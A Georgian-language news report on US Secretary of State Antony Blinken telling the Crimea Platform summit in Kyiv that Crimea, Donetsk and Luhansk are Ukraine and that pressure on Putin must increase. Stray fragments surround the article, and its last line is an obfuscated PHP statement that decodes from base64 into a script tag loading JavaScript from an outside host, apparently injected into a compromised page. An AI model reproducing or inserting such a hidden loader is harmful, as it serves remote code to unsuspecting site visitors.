celsiusi
ავერსი შნაიდერი
აუცილებელია საერთაშორისო ზეწოლისა და ფასის გაზრდა პუტინისა და მისი თანამოაზრეებისთვის, აღნიშნულის შესახებ აშშ-ის სახელმწიფო მდივანმა, ენტონი ბლინკენმა კიევში მიმდინარე „ყირიმის პლატფორმის“ სამიტზე განაცხადა.
 
„უნდა გავაგრძელოთ დაჟინებული მტკიცება, რომ ყირიმი არის უკრაინა; ისევე, როგორც დონეცკი და ლუგანსკი არის უკრაინა; ისევე, როგორც უკრაინის ნებისმიერი სხვა ნაწილი არის უკრაინა. ეს იყო ჩვენი პოზიცია 2014 წელს, ეს არის ჩვენი პოზიცია 2022 წელს. ჩვენ უნდა გავაგრძელოთ საერთაშორისო ზეწოლის და ფასის გაზრდა პრეზიდენტ პუტინისა და მისი თანამოაზრეებისთვის, ვიდრე უკრაინელი ხალხისა და მათი სუვერენული ქვეყნის უფლებები სათანადოდ არ იქნება დაცული“, – განაცხადა ბლინკენმა.
 
ბლინკენმა ხაზი გაუსვა უკრაინელებისთვის ჰუმანიტარული და დიპლომატიური დახმარების გაგრძელების აუცილებლობას, რომლებიც გაბედულად იცავენ თავიანთ უფლებებს. ასევე, ბლინკენმა განაცხადა, რომ ამერიკის შეერთებული შტატები მომავალშიც გააგრძელებს უკრაინის დახმარებას.
473
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");